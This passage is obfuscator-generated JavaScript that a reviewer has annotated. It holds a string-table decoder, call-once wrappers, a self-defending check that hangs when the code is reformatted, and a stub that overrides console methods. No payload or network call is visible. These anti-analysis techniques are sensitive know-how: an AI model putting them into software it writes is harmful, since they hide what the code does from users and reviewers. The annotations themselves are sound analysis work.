_0x3ae920: 0x10e,
_0x17968e: 0xfb,
_0x1b699f: 0x14d,
_0x5ccb44: 0x146,
_0x1270f6: 0x15c,
_0x44b00d: 0x166,
_0x147a9c: 0x14e,
_0x2e7542: 0x134,
_0x309998: 0x14b,
_0x5ee480: 0x13f,
_0x57614d: 0x11f,
_0xb63fe0: 0x145,
_0x18adec: 0x114,
_0x2d16b8: 0x12a,
_0x2e4b10: 0x13e,
_0x45c809: 0x168,
_0x2bfc7e: 0x14f,
_0x160f3a: 0x159,
_0x5e2224: 0x167,
_0x1d2868: 0x152,
_0x5909a1: 0x130,
_0x4a17f6: 0x154,
_0x3cdbb1: 0x157,
_0x23ed39: 0x15a,
_0x251934: 0x12b,
_0x37334a: 0x156,
_0x2aac5c: 0x13b,
_0x343854: 0x157,
_0x20b51c: 0x16e,
_0x1c1154: 0x115,
_0x6f8a3: 0x12b,
_0x2cdd60: 0x13c
}
, _0x141051 = {
_0x4c0a4c: 0x3e5,
_0x5af9da: 0x181
}
, _0x331a16 = {
_0x3b625e: 0x235
};
// Lookup helper: _0x2fa2(first argument + 0x235, second argument); the last
// two parameters are unused.
function _0x16015f(_0x47cbe1, _0x203be2, _0x42df40, _0x2fc801) {
return _0x2fa2(_0x47cbe1 - -_0x331a16._0x3b625e, _0x203be2);
}
// _0x1e85cf: table of comparison helpers (!==, ===) and decoded strings; the
// if-conditions further down are built by calling these helpers on these
// strings.
var _0x1e85cf = {};
_0x1e85cf[_0x16015f(-_0x4021ac._0x58c1ae, -0x124, -_0x4021ac._0x3c3fdf, -_0x4021ac._0x51959f)] = function(_0x124e68, _0x375486) {
return _0x124e68 !== _0x375486;
}
;
// Lookup helper: _0x2fa2(first argument + 0x361, third argument); the second
// and fourth parameters are unused.
function _0x1d0710(_0x534c0e, _0xd016c3, _0x1cb96e, _0x177622) {
return _0x2fa2(_0x534c0e - -0x361, _0x1cb96e);
}
_0x1e85cf['bhVnY'] = _0x1d0710(-_0x4021ac._0x1a346a, -0x282, -_0x4021ac._0x970c7c, -_0x4021ac._0x450fa8),
_0x1e85cf[_0x1d0710(-_0x4021ac._0x3dffdb, -0x288, -_0x4021ac._0x20c184, -_0x4021ac._0x1d0c10)] = function(_0xf0c5e5, _0x41f4ee) {
return _0xf0c5e5 === _0x41f4ee;
}
,
_0x1e85cf['FroGP'] = _0x16015f(-_0x4021ac._0x1fdb73, -_0x4021ac._0x5a02fe, -_0x4021ac._0x4ee755, -_0x4021ac._0x5226ab),
_0x1e85cf[_0x1d0710(-0x272, -_0x4021ac._0x20c184, -_0x4021ac._0xee055f, -_0x4021ac._0xede8f3)] = _0x16015f(-_0x4021ac._0x7e624b, -0x164, -_0x4021ac._0x446a52, -_0x4021ac._0x308418),
_0x1e85cf[_0x1d0710(-_0x4021ac._0x4ebdea, -_0x4021ac._0x26518b, -_0x4021ac._0x51d380, -_0x4021ac._0x18efbb)] = function(_0x558755, _0x4bc882) {
return _0x558755 === _0x4bc882;
}
,
_0x1e85cf[_0x16015f(-_0x4021ac._0x1d15b8, -_0x4021ac._0x1ab8ab, -_0x4021ac._0x20ee91, -_0x4021ac._0x5cc3e2)] = _0x1d0710(-_0x4021ac._0x330753, -_0x4021ac._0x182013, -_0x4021ac._0x217183, -_0x4021ac._0x3d043a);
var _0x21f727 = _0x1e85cf
, _0x14c4a4 = !![];
// The function handed back to the caller: _0x1c40d7 is the context and
// _0x5cfc78 the callback.
return function(_0x1c40d7, _0x5cfc78) {
var _0x1d01a4 = {
_0x493447: 0x4a8
};
// Two more index-shifting shims layered over _0x1d0710 and _0x16015f.
function _0x1cff74(_0x4d24a1, _0x343770, _0xfafe, _0x1eb6dc) {
return _0x1d0710(_0x4d24a1 - _0x1d01a4._0x493447, _0x343770 - 0x46, _0x343770, _0x1eb6dc - 0x190);
}
function _0x1c96af(_0x893911, _0x2291a8, _0x287241, _0x317f06) {
return _0x16015f(_0x317f06 - _0x141051._0x4c0a4c, _0x287241, _0x287241 - _0x141051._0x5af9da, _0x317f06 - 0x3b);
}
// Opaque condition: a table helper applied to two table strings.
if (_0x21f727[_0x1cff74(_0x5724b4._0x2f801f, _0x5724b4._0x3e3ff7, _0x5724b4._0x4592b5, 0x212)](_0x21f727[_0x1cff74(_0x5724b4._0x23ef8d, _0x5724b4._0x4d4486, _0x5724b4._0x1c90a0, _0x5724b4._0x16effd)], _0x21f727[_0x1cff74(0x23d, _0x5724b4._0x4453ae, _0x5724b4._0x53295a, 0x25d)])) {
var _0x3a58cc = _0x14c4a4 ? function() {
var _0x5c15d6 = {
_0x4a8bea: 0x15e,
_0x38712d: 0x30
};
function _0x140275(_0x526de1, _0x462836, _0x5d2e48, _0xcb505a) {
return _0x1c96af(_0x526de1 - 0x1d2, _0x462836 - 0x166, _0x462836, _0x5d2e48 - -0x3c4);
}
function _0x575be4(_0xaacffc, _0x4294bf, _0x5d7f4c, _0x222164) {
return _0x1cff74(_0x4294bf - -0x37a, _0xaacffc, _0x5d7f4c - _0x5c15d6._0x4a8bea, _0x222164 - _0x5c15d6._0x38712d);
}
if (_0x21f727[_0x575be4(-_0xb6c053._0x43286b, -_0xb6c053._0x21fedd, -0x12d, -_0xb6c053._0x2988ea)](_0x140275(-0x121, -_0xb6c053._0x3ae920, -0x11a, -_0xb6c053._0x17968e), _0x21f727[_0x140275(-0x153, -_0xb6c053._0x1b699f, -_0xb6c053._0x5ccb44, -_0xb6c053._0x1270f6)])) {
// NOTE(review): _0x2919f7, _0xc6e29b, _0x4d40d9 and _0x35dcd6 are not declared
// in the visible code; this looks like an injected decoy branch -- confirm it
// is unreachable.
if (_0x2919f7) {
var _0x493883 = _0xc6e29b['apply'](_0x4d40d9, arguments);
return _0x35dcd6 = null,
_0x493883;
}
} else {
if (_0x5cfc78) {
if (_0x21f727[_0x575be4(-_0xb6c053._0x44b00d, -_0xb6c053._0x147a9c, -_0xb6c053._0x2e7542, -0x168)](_0x21f727[_0x575be4(-_0xb6c053._0x309998, -_0xb6c053._0x5ee480, -_0xb6c053._0x57614d, -_0xb6c053._0xb63fe0)], _0x21f727['mGUiQ'])) {
// Flattened control flow: a decoded string plus '4' is split on '|' and its
// pieces pick the order in which the switch cases run.
// NOTE(review): the cases use identifiers that are not declared in the visible
// code (_0x59608f, _0x20b288, _0x55e4f3, ...); presumably another decoy branch.
var _0xa14e48 = (_0x575be4(-_0xb6c053._0x18adec, -_0xb6c053._0x2d16b8, -0x12d, -_0xb6c053._0x2e4b10) + '4')['split']('|')
, _0x2e30e9 = -0x384 + -0x1751 + 0x1ad5;
while (!![]) {
switch (_0xa14e48[_0x2e30e9++]) {
case '0':
var _0x1b7aa8 = _0x59608f[_0x105f60] || _0xfc9fa9;
continue;
case '1':
_0xfc9fa9['__proto__'] = _0x20b288[_0x575be4(-_0xb6c053._0x45c809, -_0xb6c053._0x2bfc7e, -0x16e, -_0xb6c053._0x160f3a)](_0xd5c9ab);
continue;
case '2':
var _0xfc9fa9 = _0x55e4f3[_0x575be4(-_0xb6c053._0x5e2224, -_0xb6c053._0x1d2868, -_0xb6c053._0x5909a1, -_0xb6c053._0x4a17f6) + 'r'][_0x575be4(-_0xb6c053._0x3cdbb1, -0x14b, -0x157, -_0xb6c053._0x5909a1)]['bind'](_0x22afd3);
continue;
case '3':
var _0x105f60 = _0x17d803[_0x3e5e3b];
continue;
case '4':
_0x38656c[_0x105f60] = _0xfc9fa9;
continue;
case '5':
_0xfc9fa9[_0x575be4(-_0xb6c053._0x3cdbb1, -_0xb6c053._0x23ed39, -_0xb6c053._0x21fedd, -_0xb6c053._0x44b00d)] = _0x1b7aa8[_0x140275(-_0xb6c053._0x251934, -_0xb6c053._0x37334a, -_0xb6c053._0x2aac5c, -0x118)][_0x575be4(-_0xb6c053._0x343854, -_0xb6c053._0x2bfc7e, -0x16b, -_0xb6c053._0x20b51c)](_0x1b7aa8);
continue;
}
break;
}
} else {
// Calls a decoded-name method of the callback with (context, arguments), then
// drops the callback reference so it cannot be invoked through this wrapper
// again. NOTE(review): the method is presumably 'apply' -- confirm.
var _0x32d595 = _0x5cfc78[_0x140275(-0x117, -_0xb6c053._0x1c1154, -_0xb6c053._0x6f8a3, -_0xb6c053._0x2cdd60)](_0x1c40d7, arguments);
return _0x5cfc78 = null,
_0x32d595;
}
}
}
}
: function() {}
;
return _0x14c4a4 = ![],
_0x3a58cc;
} else
_0xddb414 = _0x3a1bf6;
}
;
}())
// _0x5c1b7b: the wrapper obtained for `this` and the callback below. The
// callback chains decoded-name calls starting from _0x5c1b7b itself, passes
// _0x5c1b7b back in as an argument, and uses decoded strings with '+$'
// appended.
// NOTE(review): that shape matches a toString()/search() self-check on the
// function's own source text -- confirm after decoding the table. If so, a
// reformatted copy of this script may not behave like the original, which
// matters when comparing a beautified sample with the one actually served.
, _0x5c1b7b = _0x3587de(this, function() {
var _0x5ece5d = {
_0x4eda33: 0x2a1,
_0x4b8ce9: 0x2aa,
_0x23b363: 0x2ae,
_0x1c5de6: 0x2b1,
_0x18d716: 0x4c6,
_0x3a6307: 0x4d1,
_0x407b77: 0x4c2,
_0x4321fa: 0x4d7,
_0x341b4a: 0x4b7,
_0x48a6f0: 0x49b,
_0x519cab: 0x490,
_0x188735: 0x298,
_0x2797a6: 0x2aa,
_0x2468a3: 0x27d,
_0x3991c5: 0x2b8,
_0x4757e1: 0x297,
_0x36d645: 0x29a,
_0x3fe288: 0x29f,
_0x577630: 0x4c2,
_0x44c1c6: 0x4a0,
_0x26d6ba: 0x4a2,
_0x620647: 0x4a0,
_0x5471aa: 0x28d,
_0x4472b7: 0x2a5,
_0x5e590d: 0x27e,
_0x54bbea: 0x4b3,
_0x229042: 0x4ac,
_0x5d3eca: 0x4ce,
_0x80fb42: 0x4bf,
_0x1d559a: 0x4bc,
_0x1383bd: 0x49d,
_0x171396: 0x49f
}
, _0x3c7431 = {
_0x4da769: 0x3c7
}
, _0x335210 = {
_0x313b76: 0x1ac
};
// Lookup helper: _0x2fa2(first argument - 0x1ac, second argument).
function _0x249218(_0x4c60fc, _0x6b220d, _0x3984ce, _0x10467c) {
return _0x2fa2(_0x4c60fc - _0x335210._0x313b76, _0x6b220d);
}
var _0x477b54 = {};
_0x477b54[_0x249218(_0x5ece5d._0x4eda33, _0x5ece5d._0x4b8ce9, _0x5ece5d._0x23b363, _0x5ece5d._0x1c5de6)] = _0xfd96cd(_0x5ece5d._0x18d716, _0x5ece5d._0x3a6307, _0x5ece5d._0x407b77, _0x5ece5d._0x4321fa) + '+$';
var _0x8ff005 = _0x477b54;
// Lookup helper: _0x2fa2(second argument - 0x3c7, first argument). It is a
// function declaration, so the call two statements above is valid.
function _0xfd96cd(_0x110bc0, _0x4464b2, _0x10016b, _0x18ba04) {
return _0x2fa2(_0x4464b2 - _0x3c7431._0x4da769, _0x110bc0);
}
return _0x5c1b7b[_0xfd96cd(_0x5ece5d._0x341b4a, 0x4a0, _0x5ece5d._0x48a6f0, _0x5ece5d._0x519cab)]()[_0x249218(_0x5ece5d._0x188735, _0x5ece5d._0x2797a6, _0x5ece5d._0x2468a3, _0x5ece5d._0x3991c5)](_0x249218(0x2b6, _0x5ece5d._0x4757e1, _0x5ece5d._0x36d645, _0x5ece5d._0x3fe288) + '+$')[_0xfd96cd(_0x5ece5d._0x577630, _0x5ece5d._0x44c1c6, _0x5ece5d._0x26d6ba, _0x5ece5d._0x620647)]()[_0x249218(_0x5ece5d._0x5471aa, _0x5ece5d._0x4472b7, _0x5ece5d._0x4757e1, _0x5ece5d._0x5e590d) + 'r'](_0x5c1b7b)[_0xfd96cd(0x4ba, _0x5ece5d._0x54bbea, _0x5ece5d._0x229042, _0x5ece5d._0x5d3eca)](_0x8ff005[_0xfd96cd(_0x5ece5d._0x80fb42, _0x5ece5d._0x1d559a, _0x5ece5d._0x1383bd, _0x5ece5d._0x171396)]);
});
// Runs the wrapped callback once, at script load.
_0x5c1b7b();
// String-table accessor emitted by the obfuscator: turns a numeric index into a decoded string.
// The first call replaces _0x2fa2 with the inner function below, which decodes entries of the
// table returned by _0x219d() on demand and caches the results.
// NOTE(review): the cache-miss path also runs a source-text check (see 'wDfUYW'); this is why
// the listing is annotated rather than rewritten.
function _0x2fa2(_0x4dde84, _0x478812) {
var _0x29462c = _0x219d();
return _0x2fa2 = function(_0x1089fd, _0x5a8a3d) {
// Rebase the caller-supplied index; the constant expression evaluates to 0xce.
_0x1089fd = _0x1089fd - (-0x4be * 0x7 + 0x1bf5 + -0x7 * -0xdd);
var _0x32bbf7 = _0x29462c[_0x1089fd];
// One-time setup, guarded by the 'MPcALq' flag.
if (_0x2fa2['MPcALq'] === undefined) {
// Decoder: base64-style decoding with an alphabet that lists lower-case letters first,
// followed by percent-encoding of every byte and decodeURIComponent (UTF-8 decoding).
var _0x27114c = function(_0x1cfff3) {
var _0x30a4cb = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
var _0x15567f = ''
, _0x3c3450 = ''
// The decoder's own source text is concatenated into a string and sampled in the loop below.
, _0x3727b6 = _0x15567f + _0x27114c;
for (var _0x5b35e = 0x2465 + 0x4c9 + -0x6dd * 0x6, _0x305da, _0x2e25de, _0x45e1da = 0x13a8 + -0x1e99 + -0x1 * -0xaf1; _0x2e25de = _0x1cfff3['charAt'](_0x45e1da++); ~_0x2e25de && (_0x305da = _0x5b35e % (-0x8e1 * -0x2 + 0x18ab + -0x2a69) ? _0x305da * (-0x4ff + -0x2 * -0x781 + -0x9c3) + _0x2e25de : _0x2e25de,
_0x5b35e++ % (0x150 + 0x7 * 0x2a5 + -0x13cf)) ? _0x15567f += _0x3727b6['charCodeAt'](_0x45e1da + (-0x1a6c * 0x1 + 0xaab + 0xfcb)) - (0x21f7 + 0x1d4c + -0x3f39) !== -0x2d + -0x133a + 0x1 * 0x1367 ? String['fromCharCode'](0x1c0 + -0x1db4 + 0x1cf3 * 0x1 & _0x305da >> (-(0x52c + -0x1807 + 0x12dd) * _0x5b35e & 0x1771 * 0x1 + -0xf5c * 0x2 + 0x74d)) : _0x5b35e : -0x197e + 0x12c5 + -0x6b9 * -0x1) {
_0x2e25de = _0x30a4cb['indexOf'](_0x2e25de);
}
// Two hex digits per decoded character (radix expression evaluates to 16, slice to -2).
for (var _0x3bef59 = 0x387 + 0xeea + -0x1271, _0x1b19f0 = _0x15567f['length']; _0x3bef59 < _0x1b19f0; _0x3bef59++) {
_0x3c3450 += '%' + ('00' + _0x15567f['charCodeAt'](_0x3bef59)['toString'](-0x3 * 0x9c1 + -0x1 * -0x17b9 + -0x1de * -0x3))['slice'](-(-0x1dd * -0xd + 0x50f + -0x1d46));
}
return decodeURIComponent(_0x3c3450);
};
// Store the decoder, use this call's `arguments` object as the cache, mark setup as done.
_0x2fa2['iNUHtA'] = _0x27114c,
_0x4dde84 = arguments,
_0x2fa2['MPcALq'] = !![];
}
// Cache key: rebased index concatenated with table entry 0 (the index expression evaluates to 0).
var _0x1cf422 = _0x29462c[0x23d9 + -0x18fd + -0x5 * 0x22c]
, _0xf7632 = _0x1089fd + _0x1cf422
, _0x5c718f = _0x4dde84[_0xf7632];
if (!_0x5c718f) {
// Cache miss. Before decoding, a helper object tests the source text of its own small
// function ('RgxWRj') against a regular expression built from 'lwrkKC' + 'IbivLK'.
var _0x4e8342 = function(_0x5bb17b) {
this['vOUKmO'] = _0x5bb17b,
// Counters; the three expressions evaluate to 1, 0 and 0.
this['VyUlWP'] = [0x1e * -0x12d + 0x1bf2 + -0x1 * -0x755, -0x259b + -0x167 * 0x5 + -0x164f * -0x2, -0x1 * -0x88a + -0x15d0 * 0x1 + 0xd46],
this['RgxWRj'] = function() {
return 'newState';
}
,
this['lwrkKC'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',
this['IbivLK'] = '[\x27|\x22].+[\x27|\x22];?\x20*}';
};
// The regex only matches when 'RgxWRj' prints in its compact one-line form, so the outcome
// depends on whether the script text was reformatted.
_0x4e8342['prototype']['wDfUYW'] = function() {
var _0x47b17d = new RegExp(this['lwrkKC'] + this['IbivLK'])
, _0x3d3b23 = _0x47b17d['test'](this['RgxWRj']['toString']()) ? --this['VyUlWP'][0x82c + -0x2036 + 0x180b] : --this['VyUlWP'][0xc07 + 0x2228 + 0x3 * -0xf65];
return this['VDwzLi'](_0x3d3b23);
}
,
// Returns directly only when the decremented counter is -1; otherwise falls into 'xwZujq'.
_0x4e8342['prototype']['VDwzLi'] = function(_0xa402ba) {
if (!Boolean(~_0xa402ba))
return _0xa402ba;
return this['xwZujq'](this['vOUKmO']);
}
,
// The loop appends to the array it iterates and refreshes its bound on every pass, so once
// entered it does not finish. NOTE(review): with the reformatted text shown on this page the
// regex test above would fail, i.e. running this listing as printed is expected to hang here.
_0x4e8342['prototype']['xwZujq'] = function(_0x65f30f) {
for (var _0x23db3e = -0x2 * -0x1304 + -0x1 * -0x19b + -0x27a3, _0x1e8117 = this['VyUlWP']['length']; _0x23db3e < _0x1e8117; _0x23db3e++) {
this['VyUlWP']['push'](Math['round'](Math['random']())),
_0x1e8117 = this['VyUlWP']['length'];
}
return _0x65f30f(this['VyUlWP'][-0x3a2 + 0x779 * 0x1 + -0x3d7]);
}
,
new _0x4e8342(_0x2fa2)['wDfUYW'](),
// Decode the raw table entry and remember it under the cache key.
_0x32bbf7 = _0x2fa2['iNUHtA'](_0x32bbf7),
_0x4dde84[_0xf7632] = _0x32bbf7;
} else
_0x32bbf7 = _0x5c718f;
return _0x32bbf7;
}
,
_0x2fa2(_0x4dde84, _0x478812);
}
// Call-once wrapper factory. The IIFE returns a function (context, fn) that hands back a
// wrapper on its first invocation and an empty function on every later one: the closure flag
// _0x3b189a starts true and is cleared as soon as the first wrapper has been produced.
// The numeric tables and the small helper functions only compute indexes for _0x2fa2.
var _0x335615 = (function() {
var _0x3d32fd = {
_0x4dd412: 0x4b3,
_0x2e30cb: 0x4c9,
_0x1d7e3f: 0x4b3,
_0x505055: 0x49c,
_0x898066: 0x36,
_0x437ed2: 0x24,
_0xb80b08: 0x4c1,
_0x41955e: 0x4b5,
_0x226e13: 0x4b8,
_0x527505: 0x4ba,
_0x45ce2c: 0x4de,
_0x16e492: 0x4dd,
_0x165aa5: 0x4e0,
_0x3511bd: 0x502
}
, _0x42d65f = {
_0x2ddf3c: 0xd0,
_0x402929: 0xcd,
_0x4f6aa1: 0xf0,
_0x417947: 0xc0,
_0x5c83e3: 0xcf,
_0x3fcd55: 0xf3,
_0x30ce5c: 0xde,
_0x264507: 0xff,
_0x1c0668: 0x93,
_0x4241c9: 0x97,
_0x1e3a87: 0x83,
_0x37379e: 0xf2,
_0x50678c: 0xcb,
_0x3df9e5: 0xdc,
_0x19ebaf: 0xd3,
_0x4ec263: 0xa0,
_0x1f45ec: 0xcc,
_0x2e359a: 0x11b,
_0x1bb5a5: 0x123,
_0x498c1f: 0xed,
_0x5c94ca: 0x111
}
, _0x217b59 = {
_0x138f06: 0x1cf,
_0x327865: 0x38,
_0x1b3b35: 0xf9
}
, _0x2789f1 = {
_0x22fbb1: 0x5f,
_0x3fd558: 0x3e5,
_0x3623a4: 0x1cd
}
, _0x2087ec = {
_0x33f829: 0xb4
}
, _0x147f99 = {};
function _0x3bef6d(_0x5b56d3, _0x3a091c, _0x130de8, _0x562c6f) {
return _0x2fa2(_0x562c6f - -_0x2087ec._0x33f829, _0x5b56d3);
}
_0x147f99[_0x3ca6da(_0x3d32fd._0x4dd412, _0x3d32fd._0x2e30cb, _0x3d32fd._0x1d7e3f, _0x3d32fd._0x505055)] = _0x3bef6d(_0x3d32fd._0x898066, 0xb, 0x24, _0x3d32fd._0x437ed2);
function _0x3ca6da(_0x3fe9d1, _0xe366d9, _0x25f5a3, _0x379f71) {
return _0x2fa2(_0x25f5a3 - 0x3e4, _0xe366d9);
}
_0x147f99[_0x3ca6da(_0x3d32fd._0xb80b08, _0x3d32fd._0x41955e, _0x3d32fd._0x226e13, _0x3d32fd._0x527505)] = _0x3ca6da(_0x3d32fd._0x45ce2c, _0x3d32fd._0x16e492, 0x4ce, 0x4d0),
_0x147f99['ZZqwF'] = _0x3ca6da(_0x3d32fd._0x45ce2c, _0x3d32fd._0xb80b08, _0x3d32fd._0x165aa5, _0x3d32fd._0x3511bd);
var _0x3d4fb9 = _0x147f99
, _0x3b189a = !![];
return function(_0x4c04a2, _0x24bac0) {
var _0x11031c = {
_0x14b596: 0xd,
_0x170af6: 0x1a,
_0x3a5b25: 0x4,
_0x46e1f8: 0x2a,
_0x117854: 0x30,
_0x53a9fb: 0x38,
_0x5455dc: 0x4a,
_0x2b5959: 0x29,
_0x34c283: 0x10,
_0x1d9e57: 0x4ed,
_0xb9a172: 0x4ff,
_0xe479af: 0x4ea,
_0x4adc73: 0x22,
_0x426376: 0x41,
_0x5ddded: 0x3e
}
, _0x49bbd1 = {};
function _0x4145d7(_0x509318, _0x4ce127, _0x11b7da, _0x381469) {
return _0x3ca6da(_0x509318 - _0x2789f1._0x22fbb1, _0x11b7da, _0x381469 - -_0x2789f1._0x3fd558, _0x381469 - _0x2789f1._0x3623a4);
}
_0x49bbd1[_0x4145d7(0xd0, _0x42d65f._0x2ddf3c, _0x42d65f._0x402929, _0x42d65f._0x4f6aa1)] = function(_0x1d942d, _0x50c3e4) {
return _0x1d942d === _0x50c3e4;
}
;
function _0x472cde(_0x277dde, _0x742ce5, _0x42937a, _0x202bcf) {
return _0x3bef6d(_0x277dde, _0x742ce5 - _0x217b59._0x138f06, _0x42937a - _0x217b59._0x327865, _0x42937a - -_0x217b59._0x1b3b35);
}
_0x49bbd1[_0x472cde(-_0x42d65f._0x417947, -_0x42d65f._0x402929, -_0x42d65f._0x5c83e3, -0xad)] = _0x3d4fb9[_0x472cde(-_0x42d65f._0x3fcd55, -0xf1, -_0x42d65f._0x30ce5c, -_0x42d65f._0x264507)],
_0x49bbd1[_0x472cde(-_0x42d65f._0x1c0668, -_0x42d65f._0x4241c9, -0x9d, -_0x42d65f._0x1e3a87)] = _0x3d4fb9[_0x4145d7(_0x42d65f._0x37379e, _0x42d65f._0x50678c, _0x42d65f._0x3df9e5, _0x42d65f._0x19ebaf)],
_0x49bbd1['JvBtk'] = _0x3d4fb9[_0x472cde(-_0x42d65f._0x4ec263, -_0x42d65f._0x1f45ec, -0xbf, -0xd0)],
_0x49bbd1[_0x4145d7(_0x42d65f._0x2e359a, _0x42d65f._0x1bb5a5, _0x42d65f._0x498c1f, 0x10e)] = _0x4145d7(0x11a, _0x42d65f._0x5c94ca, 0xfd, 0x110);
var _0x2748d4 = _0x49bbd1
, _0x4a5a98 = _0x3b189a ? function() {
var _0x3de893 = {
_0x3f0d48: 0x1b7,
_0x40ca85: 0x1de,
_0x44cc63: 0x3e8
}
, _0x10455e = {
_0x3083d1: 0x90,
_0x632be9: 0x1b6
};
function _0xbb3584(_0x135760, _0x1cecff, _0x1b373f, _0x2eb568) {
return _0x472cde(_0x2eb568, _0x1cecff - 0x1a8, _0x135760 - _0x10455e._0x3083d1, _0x2eb568 - _0x10455e._0x632be9);
}
function _0x42ddc5(_0x2531ca, _0x3f3c80, _0x35d7ae, _0x118508) {
return _0x4145d7(_0x2531ca - _0x3de893._0x3f0d48, _0x3f3c80 - _0x3de893._0x40ca85, _0x118508, _0x35d7ae - _0x3de893._0x44cc63);
}
// The two string comparisons below choose between branches; the branches that use
// _0x5b716f / _0x31bac3 / _0x2bd5a3 refer to names not defined in this excerpt and look like
// injected dead code — TODO confirm against the deobfuscated output.
if (_0x2748d4['XbQPZ'](_0x2748d4['rdzih'], _0x2748d4[_0xbb3584(-_0x11031c._0x14b596, -_0x11031c._0x170af6, _0x11031c._0x3a5b25, -_0x11031c._0x46e1f8)])) {
var _0x137536 = _0x5b716f[_0xbb3584(-0x34, -_0x11031c._0x117854, -0x32, -_0x11031c._0x53a9fb)](_0x1130dd, arguments);
return _0x16d37e = null,
_0x137536;
} else {
if (_0x24bac0) {
if (_0x2748d4[_0xbb3584(-0x2c, -_0x11031c._0x5455dc, -_0x11031c._0x2b5959, -_0x11031c._0x34c283)](_0x2748d4[_0x42ddc5(_0x11031c._0x1d9e57, _0x11031c._0xb9a172, _0x11031c._0xe479af, 0x4ef)], _0x2748d4['iiEnj'])) {
if (_0x2bd5a3) {
var _0x233e4b = _0x31bac3[_0xbb3584(-0x34, -_0x11031c._0x4adc73, -_0x11031c._0x426376, -_0x11031c._0x5ddded)](_0x20c483, arguments);
return _0x2f7999 = null,
_0x233e4b;
}
} else {
// Working branch: call fn with the given context, then drop the reference to fn.
var _0x27b3a6 = _0x24bac0['apply'](_0x4c04a2, arguments);
return _0x24bac0 = null,
_0x27b3a6;
}
}
}
}
: function() {}
;
// Clear the flag so that every later call of the factory yields the empty function.
return _0x3b189a = ![],
_0x4a5a98;
}
;
}());
// Index-shifting wrapper around the string-table accessor: subtracts 0x88 from the first
// argument and passes the second one through. The third and fourth parameters are unused.
function _0x43b95d(_0x16a9da, _0x24077d, _0x3b1e2f, _0x31bd32) {
var _0x415853 = {
_0x365bca: 0x88
};
return _0x2fa2(_0x16a9da - _0x415853._0x365bca, _0x24077d);
}
// String table. Every entry is text encoded with the lower-case-first base64 alphabet used by
// the decoder in _0x2fa2; swapping letter case and applying ordinary base64 recovers it, e.g.
// 'Bg9N' -> 'log', 'y29UC29Szq' -> 'console', 'zNnOyNmUCgHW77Ym' -> 'fshbs.php' + U+FF0C.
// NOTE(review): which index maps to which string may also depend on setup code outside this
// excerpt — TODO confirm before relying on positions.
function _0x219d() {
var _0x30f34b = ['BgvUz3rO', 'x19WCM90B19F', 'yMHwBLK', 'r0fpB2y', 'ndq1mdK3vKXQD2Xf', 'BMn0Aw9UkcKG', 'qKriuhy', 'zNnOyNmUCgHW77Ym', 'sNfnv2u', 'sNvZDcbWyxj0ia', 'CMv0DxjUicHMDq', 'Bg9N', 'u3zVDMK', 'Dg9tDhjPBMC', 'vgHLCMuGAxmGBq', 'y29UC29Szq', 'mtq4mduYrhfgDePg', 'BeXZrMi', 'CMr6AwG', 'Ce1LCLO', 'mtqXmJaYmJbQrxjKtvi', 'y29UC3rYDwn0BW', 'mM9nEvvdtW', 't2HSvg4', 'yMLUza', 't1PSvLu', 'DhjHy2u', 'zxHJzxb0Aw9U', 'ChjVDg90ExbL', 'yxbWBhK', 'CLLSzKW', 'qM1dzLO', 'C2vHCMnO', 'sgTmCuS', 'wLPXD0y', 'BuDvAve', 'B3jLihrVignVBq', 'wgjrufO', 'qNzWyvK', 'DgfIBgu', 'rNjVr1a', 'rxH0Bwy', 'zMnKt0u', 'Dg9NzxrOzxi', 'DxHZruG', 'C0D1wvO', 'rwfHEK0', 'mtHwzwnYDvu', 'v0fUDfi', 'mtjowMn0uw4', 'mtu4mfnrCuLsuq', 'mZu5odf6wfHwA3q', 'y3rVCIGICMv0Dq', 'sgzKDhe', 'u3rPDgnOigL0ia', 'sNzcDgS', 'yvjIzxm', 'uwn3ALG', 'zxjYB3i', 'EKjJqLm', 'mJa3mtuXuMLZrvzf', 'mNWZFdb8mxW1Fa', 'kcGOlISPkYKRkq', 'ota4oe1Jtwz3Ba', 'mJa3meXSzg9OuG', 'ywXLCNq', 'ntq2mtq1D2r3rhP4', 'AwLfBMO', 'rM1vuuu', 'zLf1DKW'];
// Replace this function with one that returns the same array object on every call.
_0x219d = function() {
return _0x30f34b;
}
;
return _0x219d();
}
// Built with the call-once factory _0x335615 and invoked right after its definition.
// It obtains the global object, takes (or creates) its `console` object and then, for each of
// seven method names, installs a replacement function on that console object.
// NOTE(review): this matches the shape of an obfuscator "disable console output" stub; most
// of the names involved are looked up through the string table — TODO confirm by decoding.
var _0xfb81ef = _0x335615(this, function() {
var _0x86515e = {
_0x286f56: 0x193,
_0x19da52: 0x187,
_0x2b457d: 0x1a9,
_0x128216: 0x1b2,
_0x4ffbab: 0x1c9,
_0x28ed0e: 0x170,
_0x291b9a: 0x199,
_0x4bb0db: 0x19a,
_0x7c06bb: 0x46d,
_0x27e896: 0x48c,
_0x45dc0: 0x190,
_0x1489c9: 0x1ad,
_0x347965: 0x1a9,
_0x59f0ab: 0x449,
_0x2c1a61: 0x430,
_0x9df6de: 0x451,
_0x4f3b7c: 0x197,
_0x445b79: 0x184,
_0x35dac4: 0x196,
_0x2e155b: 0x463,
_0x4163a0: 0x440,
_0x35590a: 0x449,
_0x5a92d9: 0x48e,
_0x5713dd: 0x486,
_0x9ce866: 0x469,
_0x5d2011: 0x47a,
_0x2fb363: 0x43a,
_0x49d807: 0x441,
_0x4773f9: 0x191,
_0x2f7d38: 0x189,
_0x32352a: 0x19c,
_0xa28e16: 0x1a3,
_0x393026: 0x1be,
_0x4bed42: 0x1e0,
_0x3138ee: 0x468,
_0x1efc32: 0x48a,
_0x1e00d8: 0x46f,
_0x14f997: 0x49a,
_0x1fabb8: 0x491,
_0x18ef54: 0x489,
_0x3642df: 0x455,
_0x5e5450: 0x459,
_0x15d374: 0x45a,
_0xbb9bff: 0x452,
_0x540c80: 0x433,
_0x28a91f: 0x453,
_0x174890: 0x44f,
_0x17342b: 0x1b1,
_0x13795f: 0x18f,
_0x3c7980: 0x18e,
_0x397a84: 0x439,
_0x1dacac: 0x457,
_0x500c6c: 0x1a6,
_0x2d2155: 0x186,
_0x26599c: 0x190
}
, _0x1e0392 = {
_0x2a0a5c: 0xac
}
, _0x3d04ad = {
_0x4cc0de: 0x376
}
, _0x218a07 = {
_0x334681: 0x437,
_0x3e0531: 0x423,
_0x265858: 0x427,
_0x328b53: 0x42d,
_0x25e2fd: 0x3ff,
_0x12cc97: 0x405,
_0x4c19ff: 0x419,
_0x2f93b9: 0x415,
_0x122edb: 0x428,
